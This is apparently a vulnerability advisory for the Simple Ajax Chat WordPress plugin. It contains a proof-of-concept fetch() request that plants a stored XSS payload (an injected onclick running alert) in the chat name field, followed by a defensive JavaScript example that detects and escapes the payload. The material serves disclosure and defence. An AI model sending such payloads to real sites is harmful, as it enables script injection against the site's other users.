wpexploit, Fourcade, WPEX-ID:BF3A31DE-A227-4DB1-BD18-CE6A78DC96FB
Feb 28, 2024 - 12:00 a.m.

Simple Ajax Chat < 20240223 - Unauthenticated Stored XSS

ajax chat
unauthenticated
stored xss
vulnerable
post exploit
cors
fetch api

AI Score: 6.7 (Confidence: High)
EPSS: 0 (Percentile: 9.0%)

Description

The plugin does not prevent visitors from submitting malicious names in the chat, and those names are reflected unsanitized to other users.

await fetch("http://vulnerable-site.tld/wp-content/plugins/simple-ajax-chat/simple-ajax-chat-core.php?sacSendChat=yes", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0",
        "Accept": "*/*",
        "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
        "Content-Type": "application/x-www-form-urlencoded",
        "Sec-GPC": "1"
    },
    "body": "n=%22onclick=%22alert`1`%22&c=adasd&u=https%3A%2F%2F&sac_nonce=$NONCE&sac_js_nonce=$NONCE",
    "method": "POST",
    "mode": "cors"
});
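
The name value in the request above only acts as markup because it reaches the page without escaping. The following is an added example, not the plugin's code or its patch: it decodes the `n` field from such a form body, flags characters that can break out of a quoted HTML attribute, and compares an unescaped render with an escaped one. The function names and the `<a title="...">` template are assumptions, and the sample body is constructed from the request above.

```javascript
// Added example: helper names and the <a title="..."> template are assumptions.
// Constructed sample: the form body from the request above, nonce placeholders kept.
const SAMPLE_BODY =
  "n=%22onclick=%22alert`1`%22&c=adasd&u=https%3A%2F%2F&sac_nonce=$NONCE&sac_js_nonce=$NONCE";

const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode the characters that are significant in HTML text and quoted attributes.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Decode a form-urlencoded chat submission and report on its name field ("n").
function inspectChatBody(body) {
  const name = new URLSearchParams(body).get("n") ?? "";
  return {
    name,                                  // decoded value as the server receives it
    breaksAttribute: /["'<>]/.test(name),  // can close a quoted attribute or open a tag
    escaped: escapeHtml(name),             // what an escaping renderer would emit
  };
}

// Assumed template: the name is written into a double-quoted attribute.
function renderUnsafe(name) {
  return `<a title="${name}">chat user</a>`;
}

function renderSafe(name) {
  return `<a title="${escapeHtml(name)}">chat user</a>`;
}

// List the quoted attributes present on the first tag, to expose injected ones.
function attributeNames(html) {
  const tag = html.slice(1, html.indexOf(">"));
  return [...tag.matchAll(/([a-zA-Z-]+)\s*=\s*"[^"]*"/g)].map((m) => m[1]);
}

const report = inspectChatBody(SAMPLE_BODY);
console.log(report);
console.log("unescaped render attributes:", attributeNames(renderUnsafe(report.name)));
console.log("escaped render attributes:  ", attributeNames(renderSafe(report.name)));
```

With the unescaped render the tag gains a second attribute supplied by the visitor; with the escaped render the whole name stays inside `title`.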
